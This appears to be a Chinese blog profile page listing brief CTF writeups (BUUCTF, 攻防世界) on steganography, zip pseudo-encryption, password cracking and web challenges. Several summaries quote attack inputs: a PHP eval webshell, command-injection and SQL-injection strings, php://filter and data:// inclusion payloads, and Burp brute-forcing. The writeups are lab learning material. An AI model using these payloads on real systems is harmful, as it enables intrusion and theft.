自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(29)
  • 收藏
  • 关注

原创 BUUCTF 九连环

Steghide是一个可以将文件隐藏到图片或音频中的工具,可以隐藏文件,也可以提取隐藏文件。解压得到一张图片和一个压缩包,压缩包密码爆破不出来,猜测图片里隐藏着密码。隐藏文件:steghide embed -cf 文件名 -ef 隐藏文件。提取隐藏文件:steghide extract -sf 文件名。查看嵌入的文件信息:steghide info 文件名。提取出隐藏文件ko.txt,里面的内容即是压缩包密码。拖入winhex中,发现隐藏文件,还蛮多的。提取图片里面的隐藏文件可以用steghide。

2022-11-11 21:06:25 374 1

原创 BUUCTF 面具下的flag

x 代表解压缩文件,并且是按原始目录树解压(还有个参数 e 也是解压缩文件,但其会将所有文件都解压到根下,而不是自己原有的文件夹下)解压压缩包,是flag.vmdk,当时卡到这儿了,不知道接下来怎么做了,然后看了网上的wp,说是7z可以解压vmdk文件。压缩源文件数据区是无加密的,然而压缩源文件目录区是加密的,所以可判断为是伪加密。-o 是指定解压到的目录, -o后是没有空格的,直接接目录。key_part_one文件夹里是Brainfuck加密。命令:7z x 需要解压的文件名 -r -o./

2022-11-10 19:26:44 914

原创 BUUCTF 假如给我三天光明

对照后得到:kmdonowg,即为压缩包密码,解压后,得到一个音频文件。看到下面的字符,想到海伦凯勒是盲人,就去找到了盲人的数字英文对照表。可以发现有短的有长的,猜测摩斯密码,解密得到。下载附件,得到一张图片和一个加密的压缩包。

2022-11-09 19:34:51 275

原创 BUUCTF MISC zip伪加密

压缩源文件数据区(50 4B 03 04起)和压缩源文件目录区(50 4B 01 02起)的全局方式位标记均为。压缩源文件数据区(50 4B 03 04起)和压缩源文件目录区(50 4B 01 02起)的全局方式位标记均为。一个加密的压缩包,由三部分组成:压缩源文件数据区、压缩源文件目录区、压缩源文件目录结束标志。压缩源文件数据区(50 4B 03 04起)的全局方式位标记为。,压缩源文件目录(50 4B 01 02起)的全局方式位标记为。压缩包的文件头标记 4bytes。最后修改文件时间 2bytes。

2022-11-06 19:55:16 3179

原创 BUUCTF MISC 二维码扫描

将压缩包添加到windows里,用压缩包破解工具Ziperello,破解出密码(因为密码较为简单破解较快,但是遇到复杂密码就会很慢,推荐使用前两种方法)用winhex打开,发现4number.txt文件,猜想估计是隐藏文件,要进行文件分离。John全名John the Ripper,是一个快速的密码破解工具,kali自带的。分离出两个文件,4number.txt里面无内容,还有一个压缩包,压缩包需要密码。得到密码后,打开压缩文件,即可得到flag!-2 r/m,仅计算密码的1/m。

2022-11-04 21:09:43 973 4

原创 BUUCTF MISC N种方法解决

下载二维码图片用CQR打开得到flag。下载附件,得到一个exe文件。

2022-11-03 20:41:05 206

原创 BUUCTF [极客大挑战 2019]Knife1

web蚁剑

2022-09-26 20:37:02 1401 2

原创 攻防世界 web进阶 easytornado 【模板注入】

分别点开三个文件/flag.txt由此可知,flag在 /fllllllllllllag 里面/welcome.txt发现render函数,百度一下,render是一个渲染函数,渲染变量到模板中,模板嘿嘿嘿,猜想可能存在模板注入吧,我所知道就这些请见谅。。。。render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页 render配合Tornado使用。/hints.txtmd5(cookie_secret+md5(...

2021-11-24 21:10:54 722 2

原创 攻防世界 web进阶 PHP2【源码泄露】

php备份文件:后缀为php~或者index.php.bakphp的源代码文件:后缀为phps刚开始真的不知道要怎么做,访问了index.php也不行然后看了网上的wp才知道要访问的是index.phps,.phps后缀的是php源代码文件查看源代码可看到完整代码<?phpif("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit();}$_GET[id] = url..

2021-11-17 21:10:27 2707

原创 攻防世界 web NaNNaNNaNNaN-Batman

有一个附件,下载解压,打开有乱码是js代码,在最后看到了eval()函数,eval()函数会将传入的字符串当做 JavaScript 代码进行执行,把eval改为alert,然后再把后缀改为.html试试在浏览器中打开,发现输出了js代码复制代码然后在浏览器中打开,我是复制到了DW中打开,发现了一个输入框向输入框内输入内容页面不变,那我们来看那段js代码<script>function $(){ var e=document.getE...

2021-11-17 19:57:24 3588

原创 攻防世界 web进阶 warmup

攻防世界 web进阶区 warmup - 昊辰的小站大佬wp超详细!!!!看大佬的wp吧!!!!打开页面就是这个表情,emm.....,然后查看源代码 发现source.php接着访问source.php 发现了php代码,开始代码审计 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {..

2021-11-16 20:53:11 174

原创 攻防世界 web进阶 ics-06

进入页面后发现只有报表中心可以点进去然后在url里发现了 id=1,以为是sql注入,但是输入了半天没反应然后看了网上的wp才知道是要改变id的值,然后输入id=2,id=3,id=4 都没反应,试着用bp抓包一下bp抓包后发送到intruder 添加字典,然后开始攻击我用的字典是用python写的1-5000然后开始攻击,发现2333的长度与别的不一样在下面的responce里面也能发现flag,或者在页面中输入id=2333也能得到flag...

2021-11-16 19:35:56 2618

原创 攻防世界 web进阶 Web_php_include【php伪协议命令执行文件包含】

分析代码,发现 php:// 被过滤了 ,php://伪协议用不成了,用data://伪协议①?file=data://text/plain,<?php phpinfo();?>出现三个文件 访问fl4gisisish3r3.php然后在源代码中可看到flag②?file=data://text/plain;base64,base64编码后再url编码后的<?php phpinfo();?>然后访问fl4gisisish3r3.php 同...

2021-11-15 21:26:54 333

原创 攻防世界 web进阶 php_rce 【远程命令执行 thinkphp5 rce漏洞】

是远程命令执行 thinkphp5 rec漏洞具体执行语句可参考大佬的博客ThinkPHP 5.x远程命令执行漏洞分析与复现 - 渗透测试中心 - 博客园其实就在网上搜一下thinkphp5 rec漏洞 改一下payload 就行...

2021-11-15 19:16:37 911

原创 攻防世界 web进阶 baby_web

根据题目描述里面的提示:想想初始页面是哪个 一般的初始页面都是index.php访问index.php 直接跳转到 刚开始看到的页面所以用bp抓包现在url里访问index.php 然后抓包 发送到 repeater 得到flag...

2021-11-14 20:59:54 373

原创 攻防世界 web command_execution 【命令执行】

看到ping 就想到了命令执行 ,“请输入需要的ping地址”,就输入本机地址 127.0.0.1然后输入 ls命令:127.0.0.1 && ls 找出当前目录发现可以找到当前目录然后再找.txt 后缀的文件,输入 127.0.0.1 && find -name ".txt"找到了flag.txt ,接下来就是访问 flag.txt 输入 127.0.0.1 && cat /home/flag.tx...

2021-11-14 19:14:35 537

原创 攻防世界 web webshell 【文件上传类型】

写一个php文件,写入一句话木马 <?php @eval($_POST['shell']);?> 用蚁剑上传连接连接打开发现flag.txt打开flag.txt即可得到flag

2021-11-11 21:33:04 976 4

原创 攻防世界 web xff_referer

X-Forwarded-For:伪造原始访问ipreferer:表示一个来源,告诉服务器该网页是从哪个页面链接过来的 (come from......)使用bp抓包,ip地址为123.123.123.123,即添加xff"必须来自https://www.google.com" 即添加referer得到flag...

2021-11-11 21:21:20 259

原创 攻防世界 web get_post

GET:向特定的资源发出请求。 POST:向指定资源提交数据进行处理请求(例如提交表单或者上传文件)。数据被包含在请求体中。POST请求可能会导致新的资源的创建和/或已有资源的修改。 get在url里上传变量,post利用hackbar里面的post data 上传变量点击Execute点击 Execute得到flag...

2021-11-11 21:03:01 143

原创 攻防世界 web simple_php

打开就是php代码,分析php代码<?phpshow_source(__FILE__);include("config.php");$a=@$_GET['a'];$b=@$_GET['b'];if($a==0 and $a){ echo $flag1;}if(is_numeric($b)){ exit();}if($b>1234){ echo $flag2;}?> flag由两部分组成,flag1和flag2;如果a为0且a存在

2021-11-11 20:43:29 328

原创 攻防世界 web weak_auth

就随便输了一个admin和123456,flag就出来了!!!震惊!但是我们平时做题还是要知道解题方法的,按照平时的步骤来。随便输入 一个用户名和密码,我输入的是ad 和123,然后告诉我们用户名要用admin再查看源代码,发现需要字典,这就要使用bp爆破了。输入用户名admin,再随便输入一个密码,开启bp抓包,抓包后发送给intruder点击清除 删去admin和password的变量符,再点击添加 给password添加变量符添加弱口令密码开始攻击...

2021-11-11 20:09:26 109

原创 攻防世界 web disabled_button

点击flag按钮没有反应,查看源代码发现input标签里的 disabled属性。disabled 属性规定应该禁用的 <input> 元素。被禁用的input元素无法使用无法点击。因此我们需要把disabled属性删除删除后点击flag按钮即可得到flag...

2021-11-11 19:25:07 109

原创 攻防世界 web cookie

要找cookie,用bp抓包试试发现cookie.php,访问cookie.php查看http response 依旧用bp抓包发送到repeater,发现flag

2021-11-10 21:38:42 389

原创 攻防世界 web backup

备份文件后缀名是.bak直接在url上面访问 index.php.bak下载下来打开得到flag

2021-11-10 19:43:54 75

原创 BUUCTF [极客大挑战 2019]Http1

进入靶场查看源代码,发现Secret.php打开Secret.php

2021-11-01 19:18:56 168

原创 BUUCTF [极客大挑战 2019]Secret File1

进入靶场发现没有什么可点击的地方,查看源代码发现./Archive_room.php ,在url里访问http://501f2c25-9b3a-46a0-ab35-9b45457a7893.node4.buuoj.cn:81/Archive_room.php点击SELECT直接查阅结束,我们回去再看看返回上一个页面查看源代码,发现./action.php发现action.php是end页面,推测是速度太快,需要bp抓包,点击SELECT,抓包...

2021-10-28 20:35:22 137

原创 BUUCTF [ACTF2020 新生赛]Include1

点击tips在url里发现 ?file=flag.php由此可知flag可能在flag.php里面 猜测是文件包含漏洞现在要读取flag.php文件php://filter/read=convert.base64-encode/resource=xxx.php在url里输入:?file=php://filter/read=convert.base64-encode/resource=flag.php获得一串base64码解码得flag...

2021-10-27 20:55:26 407

原创 BUUCTF [极客大挑战 2019]Havefun1

F12查看源代码发现一串php代码<?php$cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; }分析代码,如果cat=dog,会输出 echo 'Syc{cat_cat_cat_cat}';即可得到flag...

2021-10-27 19:42:30 233

原创 BUUCTF [极客大挑战 2019]EasySQL1

打开靶场是一个登录界面观察发现是sql注入随便输入一个用户名和密码用户名或密码错误!打开hackbar利用万能密码:http://d58f314a-11b9-47af-b548-ecf0781e59c2.node4.buuoj.cn:81/check.php?username=admin'or'1'='1&password=admin'or'1'='1即可得到flag...

2021-10-27 19:22:49 97

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除